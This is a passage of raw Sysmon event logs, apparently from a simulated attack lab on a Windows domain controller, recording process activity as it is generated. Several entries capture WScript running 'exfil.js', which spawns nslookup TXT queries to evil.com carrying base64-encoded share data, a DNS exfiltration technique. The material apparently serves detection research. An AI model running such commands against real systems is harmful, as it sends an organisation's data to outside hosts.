14:16:20.959{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.959{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-3F3F-000000005F02}7236C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.959{2E1864BB-17B4-629A-3D3F-000000005F02}23087408C:\Windows\system32\cmd.exe{2E1864BB-17B4-629A-3F3F-000000005F02}7236C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.958{2E1864BB-17B4-629A-3F3F-000000005F02}7236C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B4-629A-3D3F-000000005F02}2308C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpxjws.tmp 2>&1 10341000x8000000000000000197489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.943{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-3E3F-000000005F02}2944C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.927{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-3E3F-000000005F02}2944C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.927{2E1864BB-17B4-629A-3E3F-000000005F02}29444932C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-3D3F-000000005F02}2308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.912{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-3E3F-000000005F02}2944C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.911{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.911{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.910{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-3D3F-000000005F02}2308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.911{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.910{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.910{2E1864BB-17A1-629A-783D-000000005F02}55524832C:\Windows\System32\WScript.exe{2E1864BB-17B4-629A-3D3F-000000005F02}2308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.910{2E1864BB-17B4-629A-3D3F-000000005F02}2308C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpxjws.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.907{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljsis.tmpMD5=FFC3044AFB570E80F372BF53DBBB8207,SHA256=F6E14FFAF6210075EB5936267DAFDA62885E6C7751665C0CB6BEB4993231BC98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.874{2E1864BB-17B4-629A-3B3F-000000005F02}64323796C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-3C3F-000000005F02}1700C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.858{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.858{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.858{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.858{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.858{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-3C3F-000000005F02}1700C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.858{2E1864BB-17B4-629A-3A3F-000000005F02}60087300C:\Windows\system32\cmd.exe{2E1864BB-17B4-629A-3C3F-000000005F02}1700C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.871{2E1864BB-17B4-629A-3C3F-000000005F02}1700C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B4-629A-3A3F-000000005F02}6008C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljsis.tmp 2>&1 10341000x8000000000000000197469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.843{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-3B3F-000000005F02}6432C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.843{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-3B3F-000000005F02}6432C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.843{2E1864BB-17B4-629A-323F-000000005F02}60163956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.843{2E1864BB-17B4-629A-3B3F-000000005F02}64323796C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-3A3F-000000005F02}6008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.827{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-3B3F-000000005F02}6432C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.827{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.827{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.827{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-3A3F-000000005F02}6008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 